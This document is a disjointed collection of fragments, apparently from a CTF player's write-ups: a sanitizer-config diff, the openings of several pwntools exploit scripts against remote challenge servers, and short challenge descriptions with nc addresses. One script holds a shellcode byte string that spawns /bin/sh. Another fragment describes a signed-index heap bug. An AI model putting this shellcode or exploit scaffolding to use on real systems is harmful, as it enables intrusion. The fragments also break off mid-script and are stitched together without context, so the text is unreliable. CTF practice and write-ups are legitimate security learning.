farazsth98

diff --git a/sanitizers.c b/sanitizers.c
index 78d8fafc..1c905d97 100644
--- a/sanitizers.c
+++ b/sanitizers.c
@@ -23,7 +23,6 @@
     "symbolize=1:"                 \
     "detect_leaks=0:"              \
     "disable_coredump=0:"          \
-    "detect_odr_violation=0:"      \
     "allocator_may_return_null=1:" \

farazsth98

#!/usr/bin/env python3

from pwn import *

context.arch = "sparc"

elf = ELF("./sparc-2")
p = remote("flu.xxx", 2025)

shellcode = b"AA\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10\xc0\x23\xbf\xec\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a\x82\x10\x20\x3b\x91\xd0\x20\x08\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

farazsth98

#!/usr/bin/env python3

from pwn import *

elf = ELF("./shadowstuck")
libc = ELF("./libc-2.31.so")
#p = process("./shadowstuck", env={"LD_PRELOAD": "./libc-2.31.so"})
p = remote("challenges.ctf.kaf.sh", 8000)

'''

farazsth98

Functionality

At the beginning, the binary lets you enter 0x20 bytes for your name. This is stored in the bss section, and it is not null terminated. After this, you get the following menu options:

1. Show Name - Shows you your name
2. Write Diary - Lets you allocate a page of max 0x80 size. The first four bytes of this page chunk stores the size you choose, and then the rest is the content you enter. calloc is used to allocate this chunk. This chunk's pointer is stored in an array immediately after your name in the bss section (meaning the name can be aligned to it and you can leak it using option 1). You can have a max of 14 pages.
3. Read Diary - Lets you pick a page index, and the corresponding page contents is output to you (using puts).
4. Edit Diary - Lets you pick a page index to edit. It will use the size stored in the first 4 bytes of the page chunk to determine how many bytes you can edit. The page index you enter is signed, so there is a bug here (you can enter negative

farazsth98

# Writeup at https://faraz.faith/2020-11-23-dragonctf-bitmapmanager/
# Credits to https://twitter.com/RBTree_

import struct
from pwn import *

def make_image(length, check):
    t = b"BM" # signature
    t += struct.pack("<I", length) # file size
    t += b'\x00' * 4 # reserved, has to be 0

farazsth98

I spent around 3 hrs solving this. I wish I had more time to spend on this CTF because the challenges looked really good!

Challenge

• Points: 420
• Solves: 4
• Files: jheap.tar.gz, jheap.conf

Basically just a Java Heap pwn challenge. You can create and edit chunks, but its done through a JNI function written in C, which means memory corruption is a possibility.

farazsth98

#!/usr/bin/env python3

from pwn import *

context.arch = "amd64"

'''
Bug 1 - printf(hanger[msg]) in the display() function is a format
        string bug. My exploit doesn't use it though.
        

farazsth98

I played Harekaze Mini CTF 2020 for about 3 hours this weekend. The pwn challenges were nice (I especially enjoyed nm-game-extreme). Here are some short writeups.

shellcode

The program just tells you to provide shellcode that will execute execve("/bin/sh", NULL, NULL). It gives you the address of the "/bin/sh" string, so you just create shellcode to do the job and send it:

#!/usr/bin/env python3

from pwn import *

farazsth98

Here's a cool notepad! We heard that Bjarne Stroustrup himself uses it to manage his notes. Does that make it... notepad++?

nc 35.205.119.236 1337

Author: mrtumble & nankeen

Solves: 10

Functionality

farazsth98

Just another object creation primitive. Please, obtain the flag.

custom.tar.gz

nc 151.236.114.211 17102

Hint: FROM mcr.microsoft.com/dotnet/runtime:5.0

Author: keltecc (Discord)